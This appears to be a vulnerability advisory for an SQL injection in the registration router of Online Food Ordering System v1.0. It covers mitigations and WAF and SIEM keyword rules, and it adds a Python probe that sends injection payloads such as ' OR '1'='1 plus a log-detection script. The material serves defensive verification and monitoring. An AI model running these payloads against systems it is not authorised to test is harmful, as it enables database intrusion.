CVE-2023-45342

9.8 CRITICAL

📋 TL;DR

Online Food Ordering System v1.0 contains an unauthenticated SQL injection vulnerability in the phone parameter handled by routers/register-router.php, the registration router. Anyone who can reach the registration form can execute arbitrary SQL statements against the application's database without holding an account, up to full compromise of that database. All deployments of v1.0 are affected.

💻 Affected Systems

Products:
  • Online Food Ordering System
Versions: v1.0
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the default installation and requires no special configuration to be exploitable.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise: data theft, data destruction, authentication bypass and, where the database account holds file-write or similar privileges, potential remote code execution through database functions.

🟠

Likely Case

Database information disclosure, credential theft, and potential privilege escalation to administrative access.

🟢

If Mitigated

Limited impact when the phone value is validated server-side and the database account is restricted to the tables and privileges the application needs; injection attempts still reach the logs and should be alerted on.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

SQL injection via phone parameter in routers/register-router.php requires no authentication and uses simple payloads.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://projectworlds.in/

Restart Required: No

Instructions:

1. Check the vendor website for an updated version.
2. If one is available, back up the database and application files.
3. Replace the vulnerable files with the patched version.
4. Test registration and the rest of the application.

🔧 Temporary Workarounds

Input Validation Filter

Platform: all

Add server-side validation so that the phone parameter is accepted only when it consists of digits.

Modify routers/register-router.php to check the phone parameter with preg_match('/^[0-9]+$/', $_POST['phone']) and reject the request when the match fails. Note that $ in PCRE also matches before a trailing newline, so anchor with \z (or add the D modifier) to avoid accepting a value such as "123" followed by a newline. This narrows only the phone parameter; the query is still built from request input, so the real fix is to convert it to a prepared statement with bound parameters.

WAF Rule

Platform: all

Use web application firewall rules to block SQL injection patterns in the registration request.

Add a WAF rule that denies POST requests to routers/register-router.php whose phone parameter contains SQL keywords such as UNION, SELECT, INSERT, UPDATE, DELETE or DROP. Because a phone number should be purely numeric, a positive rule that blocks any non-digit character in phone is both simpler and harder to evade than a keyword list, which attackers bypass with case changes, inline comments and URL encoding. Make sure the rule inspects the decoded POST body, not only the query string.

🧯 If You Can't Patch

  • Implement strict input validation and parameterized queries in the application code
  • Restrict database user permissions to minimum required and implement network segmentation

🔍 How to Verify

Check if Vulnerable:

Against a test copy (each request creates a registration record), send two POST requests to routers/register-router.php: one with a normal numeric phone value as a control and one with a payload such as ' OR '1'='1 or a single trailing quote. A SQL error in the response, a different status code, or a response that differs from the control indicates the value reaches the query unescaped. If the server hides database errors, the comparison may be inconclusive and a time-based payload is the next step.

Check Version:

Compare the installed files against the vendor's v1.0 release. In the absence of a reliable version string, inspect routers/register-router.php and treat the installation as vulnerable if the phone value is placed into the SQL string directly rather than bound as a query parameter.

Verify Fix Applied:

Re-send the same payloads and confirm they are rejected by validation or, if accepted, produce no SQL error and no difference in behaviour compared with a normal phone value.
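The differential check described above, written out as an added example (it is not the advisory's or the vendor's code). The base URL, the form field names other than phone, and the error-message markers are assumptions; adjust them to the installation under test, and run it only against a test copy because every request is a registration attempt.

```python
"""
Added example (not the advisory's or the vendor's code): a differential
check for the phone parameter of routers/register-router.php. The base
URL, the form field names other than 'phone', and the error markers are
assumptions; adjust them to the installation under test.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

# Assumed form fields; only 'phone' is named by the advisory.
BASE_FORM = {
    "name": "probe",
    "password": "Pr0be-pass",
    "phone": "5550001234",
}

# Fragments commonly seen when a MySQL/PHP error leaks into the page (assumed).
SQL_ERROR_MARKERS = (
    "You have an error in your SQL syntax",
    "mysqli_sql_exception",
    "Warning: mysqli",
    "SQLSTATE[",
)


def payload_forms():
    """Control request plus two probes: a lone trailing quote, which
    breaks the statement if the value is concatenated into SQL, and the
    advisory's quote-balanced ' OR '1'='1 payload. Each form gets its own
    e-mail so a 'user already exists' branch does not skew the comparison."""
    probes = [
        ("control", "5550001234"),
        ("unbalanced_quote", "5550001234'"),
        ("or_true", "5550001234' OR '1'='1"),
    ]
    return [
        (label, dict(BASE_FORM, phone=phone, email=f"probe-{label}@example.invalid"))
        for label, phone in probes
    ]


def classify(control_body, probe_body, control_status, probe_status):
    """Compare a probe response with the control response."""
    if any(marker in probe_body for marker in SQL_ERROR_MARKERS):
        return "vulnerable:sql-error-in-response"
    if probe_status != control_status:
        return "suspicious:status-differs"   # e.g. 500 when display_errors is off
    if probe_body != control_body:
        return "suspicious:body-differs"     # needs a manual look
    return "no-difference"


def post_form(url, form, timeout=10):
    """POST a form and return (status, body), also for HTTP error statuses."""
    data = urllib.parse.urlencode(form).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def probe(base_url):
    """Send the control first, then each probe, and classify the results.
    Run this only against a test copy: every request is a registration."""
    url = base_url.rstrip("/") + "/routers/register-router.php"
    forms = payload_forms()
    control_status, control_body = post_form(url, forms[0][1])
    results = {}
    for label, form in forms[1:]:
        status, body = post_form(url, form)
        results[label] = classify(control_body, body, control_status, status)
    return results


if __name__ == "__main__":
    for label, verdict in probe(sys.argv[1]).items():
        print(f"{label}: {verdict}")
```

Invoke it as python3 check_register.py http://test-host. An sql-error verdict is conclusive; a status or body difference with errors hidden is only a lead, and the same run after patching should come back as no-difference or a validation rejection for both probes.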

📡 Detection & Monitoring

Log Indicators:

  • Unusual SQL errors in application logs
  • Multiple failed registration attempts with special characters in phone field
  • Database queries with unexpected UNION or SELECT statements

Network Indicators:

  • HTTP POST requests to register-router.php containing SQL keywords in parameters
  • Unusual database connection patterns from web server

SIEM Query:

source="web_logs" AND uri="/routers/register-router.php" AND (phone="*UNION*" OR phone="*SELECT*" OR phone="*OR*1=1*")

This query only works where the POST body is logged and its fields are extracted and URL-decoded (for example from a WAF or reverse proxy with request-body logging); ordinary access logs record only the request line. Keyword wildcards are also case-sensitive on some platforms and miss encoded payloads, so pair them with a match on any non-digit character in the phone field.
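The detection logic behind that query, run over a few constructed log lines as an added example (not from the advisory). The log format with a trailing body= field is an assumption standing in for whatever request-body logging is in place; the point it shows is that matching has to happen on the URL-decoded phone value, case-insensitively, or the advisory's own payload (sent as %27+OR+%271%27%3D%271) is missed.

```python
"""
Added example, not from the advisory: the SIEM query implemented over
constructed access-log lines. The 'body=' field is an assumed logging
format; production access logs usually lack the POST body entirely.
"""
import re
import urllib.parse
from collections import Counter

# Constructed sample lines: one benign registration, three probes from one
# source (the advisory's payload, a UNION probe, a case-varied UNION probe),
# and an unrelated GET.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2023:10:00:01 +0000] "POST /routers/register-router.php HTTP/1.1" 200 512 body=name=alice&phone=5550001234&email=a%40example.com
10.0.0.9 - - [12/Oct/2023:10:00:07 +0000] "POST /routers/register-router.php HTTP/1.1" 200 498 body=name=x&phone=%27+OR+%271%27%3D%271&email=x%40example.com
10.0.0.9 - - [12/Oct/2023:10:00:09 +0000] "POST /routers/register-router.php HTTP/1.1" 500 0 body=name=x&phone=1%27+UNION+SELECT+1%2C2%2C3--+-&email=x%40example.com
10.0.0.9 - - [12/Oct/2023:10:00:12 +0000] "POST /routers/register-router.php HTTP/1.1" 200 498 body=name=x&phone=1%27+uNiOn%20sElEcT%20user%28%29--&email=x%40example.com
10.0.0.7 - - [12/Oct/2023:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048 body=
"""

LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \d+ body=(?P<body>.*)$'
)
TARGET_PATH = "/routers/register-router.php"

# Patterns run on the decoded phone value; keywords are matched case-insensitively.
INJECTION_PATTERNS = {
    "union": re.compile(r"\bUNION\b", re.I),
    "select": re.compile(r"\bSELECT\b", re.I),
    "or-1=1": re.compile(r"\bOR\b\s*'?1'?\s*=\s*'?1", re.I),
    "sql-comment": re.compile(r"(--|#|/\*)"),
    "quote": re.compile(r"'"),
}
# What a legitimate phone value looks like (assumed: digits, spaces, dashes, optional +).
VALID_PHONE = re.compile(r"^\+?[0-9][0-9 -]{4,19}$")


def analyze_line(line):
    """Return an alert dict for a suspicious registration POST, else None."""
    m = LOG_LINE.match(line)
    if not m or m["method"] != "POST" or m["path"] != TARGET_PATH:
        return None
    # parse_qs percent-decodes and turns '+' into a space, so the patterns
    # see the payload the application saw, not its encoded form.
    fields = urllib.parse.parse_qs(m["body"], keep_blank_values=True)
    phone = fields.get("phone", [""])[0]
    reasons = [name for name, rx in INJECTION_PATTERNS.items() if rx.search(phone)]
    if not VALID_PHONE.match(phone):
        reasons.append("non-numeric-phone")
    if not reasons:
        return None
    return {"src": m["src"], "ts": m["ts"], "status": int(m["status"]),
            "phone": phone, "reasons": reasons}


def scan(log_text):
    """Run analyze_line over every line and keep the alerts, in log order."""
    return [a for a in (analyze_line(l) for l in log_text.splitlines()) if a]


def sources_over_threshold(alerts, threshold=2):
    """Sources with repeated hits, i.e. the 'multiple attempts' indicator."""
    counts = Counter(a["src"] for a in alerts)
    return {src: n for src, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"{a['ts']} {a['src']} status={a['status']} phone={a['phone']!r} {a['reasons']}")
    print("repeat sources:", sources_over_threshold(found))
```

The non-numeric-phone reason fires on every probe regardless of keyword choice, which is why a positive check on the field's expected shape is the more robust signal; the keyword reasons mainly help triage.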
